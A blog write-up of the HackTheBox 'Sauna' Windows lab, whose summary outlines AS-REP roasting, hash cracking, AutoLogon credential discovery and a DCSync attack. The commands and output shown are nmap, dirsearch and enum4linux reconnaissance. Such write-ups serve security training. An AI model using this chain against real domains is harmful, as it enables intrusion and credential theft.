<!DOCTYPE html>
<html lang=en>

<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <script src="https://cdnjs.cloudflare.com/ajax/libs/baffle.js/0.2.1/baffle.min.js"></script>
    <meta name="description" content="Quick Summary   → A fun box machine running on Windows with great Active directory on it! The website running on port 80 has given some usernames on abous-us page. I do brute force web directories l">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Sauna 🔥💥">
<meta property="og:url" content="https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/index.html">
<meta property="og:site_name" content="❯ PΛYΛƧ0">
<meta property="og:description" content="Quick Summary   → A fun box machine running on Windows with great Active directory on it! The website running on port 80 has given some usernames on abous-us page. I do brute force web directories l">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ph-payas0.github.io/img/sauna/sauna.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sauna/sauna-home-page.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sauna/sauna-about-us.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sauna/sauna-dcsync.png">
<meta property="og:image" content="https://www.hackthebox.eu/badge/image/128965">
<meta property="article:published_time" content="2020-07-15T15:23:18.000Z">
<meta property="article:modified_time" content="2020-12-13T16:10:32.105Z">
<meta property="article:author" content="medz">
<meta property="article:tag" content="windows">
<meta property="article:tag" content="retired">
<meta property="article:tag" content="python-impackets">
<meta property="article:tag" content="GetNPUsers">
<meta property="article:tag" content="Evil-WinRM">
<meta property="article:tag" content="WinPEAS">
<meta property="article:tag" content="Ldap">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ph-payas0.github.io/img/sauna/sauna.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon-1.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>HackTheBox - Sauna 🔥💥</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="❯ PΛYΛƧ0" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2020-07-08/HackTheBox-Book/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&text=HackTheBox - Sauna 🔥💥"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&is_video=false&description=HackTheBox - Sauna 🔥💥"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Sauna 🔥💥&body=Check out this article: https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&title=HackTheBox - Sauna 🔥💥"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&name=HackTheBox - Sauna 🔥💥&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-07-15/HackTheBox-Sauna/&t=HackTheBox - Sauna 🔥💥"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#The-Sauna-Website"><span class="toc-number">4.1.</span> <span class="toc-text">The Sauna Website</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Enumerationg-USERS"><span class="toc-number">5.1.</span> <span class="toc-text">Enumerationg USERS</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Kerberos-Pre-Authentication"><span class="toc-number">6.1.</span> <span class="toc-text">Kerberos Pre-Authentication</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-user-txt"><span class="toc-number">6.2.</span> <span class="toc-text">Grab user.txt</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Escalating-to-svc-loanmgr"><span class="toc-number">7.1.</span> <span class="toc-text">Escalating to svc_loanmgr</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Login-as-svc-loanmanager"><span class="toc-number">7.2.</span> <span class="toc-text">Login as svc_loanmanager</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-the-root-txt"><span class="toc-number">7.3.</span> <span class="toc-text">Grab the root.txt</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
        <div class="content index py4">
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Sauna 🔥💥
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">❯ PΛYΛƧ0</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-07-15T15:23:18.000Z" itemprop="datePublished">15-07-2020</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/HackTheBox/PenTesting/">PenTesting</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Evil-WinRM/" rel="tag">Evil-WinRM</a>, <a class="tag-link-link" href="/tags/GetNPUsers/" rel="tag">GetNPUsers</a>, <a class="tag-link-link" href="/tags/Ldap/" rel="tag">Ldap</a>, <a class="tag-link-link" href="/tags/WinPEAS/" rel="tag">WinPEAS</a>, <a class="tag-link-link" href="/tags/python-impackets/" rel="tag">python-impackets</a>, <a class="tag-link-link" href="/tags/retired/" rel="tag">retired</a>, <a class="tag-link-link" href="/tags/windows/" rel="tag">windows</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><img src="/img/sauna/sauna.png" alt="HackTheBox-Book" title="Sauna"></p>
<hr>
<h2 id="Quick-Summary"><a href="#Quick-Summary" class="headerlink" title="Quick Summary"></a>Quick Summary</h2><p>   → A fun box machine running on Windows with great Active directory on it! The website running on <code>port</code> 80 has given some usernames on <code>abous-us</code> page. I do brute force web directories like I always did on website enumeration but I didn’t find anything. Running <code>enum4linux</code> I find some useful information that will probably help me to get in. Using <code>GetNPUsers</code> I’ve managed to dump user password hash and I crack it with <code>john</code> and grab the <code>user.txt</code>. In privilege escalation part, I use <code>WinPEAS</code> to get find interesting stuffs like credentials or misconfiguration, and I found a <code>autoLogon</code> credentials. To get the root, the machine is vulnerable to <code>DcSync</code> attack, I get the admin hash with <code>secretsdump</code> and with <code>psexec</code> I login as <code>administrator</code> and finally grab the <code>root.txt</code>.</p>
<hr>
<h2 id="Penetration-Testing-Methodologies"><a href="#Penetration-Testing-Methodologies" class="headerlink" title="Penetration Testing Methodologies"></a>Penetration Testing Methodologies</h2><ol>
<li><p><strong>Network Scanning</strong></p>
<p>→ Nmap scan</p>
<p>→ discover open ports and what services are running</p>
</li>
<li><p><strong>Enumeration</strong></p>
<p>→ visiting the Website looking for possible hint</p>
<p>→ found some possible <code>users</code> on <code>about-us</code> page</p>
</li>
<li><p><strong>Post - Exploitation</strong></p>
<p>→ brute force web directories with <code>dirsearch</code></p>
<p>→ enumerate windows box with <code>enum4linux</code> to get some juicy information</p>
<p>→ list all the <code>users</code> in a text file with <code>name</code> variation</p>
</li>
<li><p><strong>Exploitation</strong></p>
<p>→ check if the <code>Kerberos pre-authentication</code> required is not set and doing a asreproast attack</p>
<p>→ using <a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py">GetNPUSers</a> i’ve manage to dump the user password hash with his <code>username</code> in it.</p>
<p>→ crack the password hash with <code>john</code></p>
<p>→ Login as <code>FSmith</code> with <code>evil-winrm</code> and grab <code>user.txt</code></p>
</li>
<li><p><strong>Privilege Escalation</strong></p>
<p>→ upload <code>WinPEAS</code> and run to find some juicy info that I can use for privile escalation</p>
<p>→ I found another credentials that is <code>AutoLogon</code></p>
<p>→ login again as <code>svc_loanmgr</code> user using <code>evil-winrm</code></p>
<p>→ <code>svc_loanmgr</code> has permission on <code>GetchangesAll</code> so we can perform <code>DcSync</code> Attack</p>
<p>→ grab <code>administrator</code> password hash with <code>secretsdump</code></p>
<p>→ Login as <code>administrator</code> again using <code>psexec</code> and finally grab the <code>root.txt</code></p>
</li>
</ol>
<hr>
<h2 id="Network-Scanning"><a href="#Network-Scanning" class="headerlink" title="Network Scanning"></a>Network Scanning</h2><h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p>→ I always begin at <strong><em>NMAP</em></strong> to look on the services what is running. I always use</p>
<hr>
<ul>
<li>-sV      ⇒ Probe open ports to determine service/version info</li>
<li>-sC      ⇒ equivalent to —script=default</li>
<li>-A-      ⇒ Agressive scan</li>
<li>-oN      ⇒ to save our scan results to a text file</li>
</ul>
<hr>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna </span><br><span class="line">❯ nmap -sV -sC -T4 -A 10.10.10.175 -oN nmap-Sauna</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 07:17 PST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.175</span><br><span class="line">Host is up (0.21s latency).</span><br><span class="line">Not shown: 988 filtered ports</span><br><span class="line">PORT     STATE SERVICE       VERSION</span><br><span class="line">53/tcp   open  domain?</span><br><span class="line">| fingerprint-strings: </span><br><span class="line">|   DNSVersionBindReqTCP: </span><br><span class="line">|     version</span><br><span class="line">|_    <span class="built_in">bind</span></span><br><span class="line">80/tcp   open  http          Microsoft IIS httpd 10.0</span><br><span class="line">| http-methods: </span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">|_http-title: Egotistical Bank :: Home</span><br><span class="line">88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-21 06:21:01Z)</span><br><span class="line">135/tcp  open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">464/tcp  open  kpasswd5?</span><br><span class="line">593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp  open  tcpwrapped</span><br><span class="line">3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp open  tcpwrapped</span><br><span class="line">1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :</span><br><span class="line">SF-Port53-TCP:V=7.80%I=7%D=3/21%Time=5E754F50%P=x86_64-pc-linux-gnu%r(DNSV</span><br><span class="line">SF:ersionBindReqTCP,20,<span class="string">&quot;\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\</span></span><br><span class="line"><span class="string">SF:x04bind\0\0\x10\0\x03&quot;</span>);</span><br><span class="line">Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</span><br><span class="line">OS fingerprint not ideal because: Missing a closed TCP port so results incomplete</span><br><span class="line">No OS matches <span class="keyword">for</span> host</span><br><span class="line">Network Distance: 2 hops</span><br><span class="line">Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_clock-skew: 7h02m24s</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   2.02: </span><br><span class="line">|_    Message signing enabled and required</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2020-03-21T06:23:55</span><br><span class="line">|_  start_date: N/A</span><br><span class="line"></span><br><span class="line">TRACEROUTE (using port 135/tcp)</span><br><span class="line">HOP RTT       ADDRESS</span><br><span class="line">1   211.01 ms 10.10.14.1</span><br><span class="line">2   50.45 ms  10.10.10.175</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 395.18 seconds</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna took 6m35s </span><br><span class="line">❯ </span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Nmap-results"><a href="#Nmap-results" class="headerlink" title="Nmap results"></a>Nmap results</h3><p>So there’s a lot of port open. only 3 ports are interesting</p>
<ul>
<li>80       ⇒ which basically a web service</li>
<li>88       ⇒ which running on Kerberos</li>
<li>5985       ⇒ WinRM</li>
</ul>
<hr>
<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><h3 id="The-Sauna-Website"><a href="#The-Sauna-Website" class="headerlink" title="The Sauna Website"></a>The Sauna Website</h3><p>Since there’s web service I always looking that first</p>
<p><img src="/img/sauna/sauna-home-page.png" alt="HackTheBox-Book" title="Sauna home page"></p>
<p>In the website I found a possible list of users in <code>about-us</code> page</p>
<p><img src="/img/sauna/sauna-about-us.png" alt="HackTheBox-Book" title="Sauna about us"></p>
<hr>
<h2 id="Post-Exploitation"><a href="#Post-Exploitation" class="headerlink" title="Post - Exploitation"></a>Post - Exploitation</h2><h3 id="Enumerationg-USERS"><a href="#Enumerationg-USERS" class="headerlink" title="Enumerationg USERS"></a>Enumerationg USERS</h3><p>I didn’t find anything in the whole website so I decided to brute force the web directories like I always do in web attacking :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna </span><br><span class="line">❯ python3 /opt/dirsearch/dirsearch.py -u <span class="string">&quot;http://10.10.10.175/&quot;</span> -e asd -t 20 --simple-report=sauna-directories</span><br><span class="line"></span><br><span class="line"> _|. _ _  _  _  _ _|_    v0.3.9</span><br><span class="line">(_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109</span><br><span class="line"></span><br><span class="line">Error Log: /opt/dirsearch/logs/errors-20-03-21_07-40-57.log</span><br><span class="line"></span><br><span class="line">Target: http://10.10.10.175/</span><br><span class="line"></span><br><span class="line">[07:40:59] Starting: </span><br><span class="line">[07:41:00] 403 -  312B  - /%2e%2e/google.com</span><br><span class="line">[07:41:52] 301 -  147B  - /css  -&gt;  http://10.10.10.175/css/                                                      </span><br><span class="line">[07:42:08] 301 -  149B  - /fonts  -&gt;  http://10.10.10.175/fonts/                                      </span><br><span class="line">[07:42:18] 301 -  150B  - /images  -&gt;  http://10.10.10.175/images/     </span><br><span class="line">[07:42:18] 301 -  150B  - /Images  -&gt;  http://10.10.10.175/Images/</span><br><span class="line">[07:42:19] 200 -   32KB - /index.html                                                                          </span><br><span class="line">                                                                                                                  </span><br><span class="line">Task Completed</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna took 2m15s </span><br><span class="line">❯ </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Didn’t find anything again so I use <code>enum4linux</code> to find some juicy information in the box :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna </span><br><span class="line">❯ enum4linux 10.10.10.175</span><br><span class="line">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 21 08:02:10 2020</span><br><span class="line"></span><br><span class="line"> ========================== </span><br><span class="line">|    Target Information    |</span><br><span class="line"> ========================== </span><br><span class="line">Target ........... 10.10.10.175</span><br><span class="line">RID Range ........ 500-550,1000-1050</span><br><span class="line">Username ......... <span class="string">&#x27;&#x27;</span></span><br><span class="line">Password ......... <span class="string">&#x27;&#x27;</span></span><br><span class="line">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> ==================================================== </span><br><span class="line">|    Enumerating Workgroup/Domain on 10.10.10.175    |</span><br><span class="line"> ==================================================== </span><br><span class="line">[E] Can<span class="string">&#x27;t find workgroup/domain</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ============================================ </span></span><br><span class="line"><span class="string">|    Nbtstat Information for 10.10.10.175    |</span></span><br><span class="line"><span class="string"> ============================================ </span></span><br><span class="line"><span class="string">Looking up status of 10.10.10.175</span></span><br><span class="line"><span class="string">No reply from 10.10.10.175</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ===================================== </span></span><br><span class="line"><span class="string">|    Session Check on 10.10.10.175    |</span></span><br><span class="line"><span class="string"> ===================================== </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.</span></span><br><span class="line"><span class="string">[+] Server 10.10.10.175 allows sessions using username &#x27;</span><span class="string">&#x27;, password &#x27;</span><span class="string">&#x27;</span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.</span></span><br><span class="line"><span class="string">[+] Got domain/workgroup name: </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> =========================================== </span></span><br><span class="line"><span class="string">|    Getting domain SID for 10.10.10.175    |</span></span><br><span class="line"><span class="string"> =========================================== </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.</span></span><br><span class="line"><span class="string">Domain Name: EGOTISTICALBANK</span></span><br><span class="line"><span class="string">Domain Sid: S-1-5-21-2966785786-3096785034-1186376766</span></span><br><span class="line"><span class="string">[+] Host is part of a domain (not a workgroup)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ====================================== </span></span><br><span class="line"><span class="string">|    OS information on 10.10.10.175    |</span></span><br><span class="line"><span class="string"> ====================================== </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.</span></span><br><span class="line"><span class="string">Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.</span></span><br><span class="line"><span class="string">[+] Got OS info for 10.10.10.175 from smbclient: </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.</span></span><br><span class="line"><span class="string">[+] Got OS info for 10.10.10.175 from srvinfo:</span></span><br><span class="line"><span class="string">Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ============================= </span></span><br><span class="line"><span class="string">|    Users on 10.10.10.175    |</span></span><br><span class="line"><span class="string"> ============================= </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.</span></span><br><span class="line"><span class="string">[E] Couldn&#x27;</span>t find users using querydispinfo: NT_STATUS_ACCESS_DENIED</span><br><span class="line"></span><br><span class="line">Use of uninitialized value <span class="variable">$global_workgroup</span> <span class="keyword">in</span> concatenation (.) or string at ./enum4linux.pl line 881.</span><br><span class="line">[E] Couldn<span class="string">&#x27;t find users using enumdomusers: NT_STATUS_ACCESS_DENIED</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ========================================= </span></span><br><span class="line"><span class="string">|    Share Enumeration on 10.10.10.175    |</span></span><br><span class="line"><span class="string"> ========================================= </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        Sharename       Type      Comment</span></span><br><span class="line"><span class="string">        ---------       ----      -------</span></span><br><span class="line"><span class="string">SMB1 disabled -- no workgroup available</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Attempting to map shares on 10.10.10.175</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ==================================================== </span></span><br><span class="line"><span class="string">|    Password Policy Information for 10.10.10.175    |</span></span><br><span class="line"><span class="string"> ==================================================== </span></span><br><span class="line"><span class="string">[E] Unexpected error from polenum:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Attaching to 10.10.10.175 using a NULL share</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Trying protocol 139/SMB...</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        [!] Protocol failed: Cannot request session (Called Name:10.10.10.175)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Trying protocol 445/SMB...</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - &#123;Access Denied&#125; A process has requested access to an object but has not been granted those access rights.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[E] Failed to get password policy with rpcclient</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ============================== </span></span><br><span class="line"><span class="string">|    Groups on 10.10.10.175    |</span></span><br><span class="line"><span class="string"> ============================== </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Getting builtin groups:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Getting builtin group memberships:</span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Getting local groups:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Getting local group memberships:</span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Getting domain groups:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[+] Getting domain group memberships:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ======================================================================= </span></span><br><span class="line"><span class="string">|    Users on 10.10.10.175 via RID cycling (RIDS: 500-550,1000-1050)    |</span></span><br><span class="line"><span class="string"> ======================================================================= </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.</span></span><br><span class="line"><span class="string">[E] Couldn&#x27;</span>t get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.</span><br><span class="line">Use of uninitialized value <span class="variable">$global_workgroup</span> <span class="keyword">in</span> concatenation (.) or string at ./enum4linux.pl line 742.</span><br><span class="line"></span><br><span class="line"> ============================================= </span><br><span class="line">|    Getting printer info <span class="keyword">for</span> 10.10.10.175    |</span><br><span class="line"> ============================================= </span><br><span class="line">Use of uninitialized value <span class="variable">$global_workgroup</span> <span class="keyword">in</span> concatenation (.) or string at ./enum4linux.pl line 991.</span><br><span class="line">Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">enum4linux complete on Sat Mar 21 08:03:39 2020</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna took 1m29s </span><br><span class="line">❯ </span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

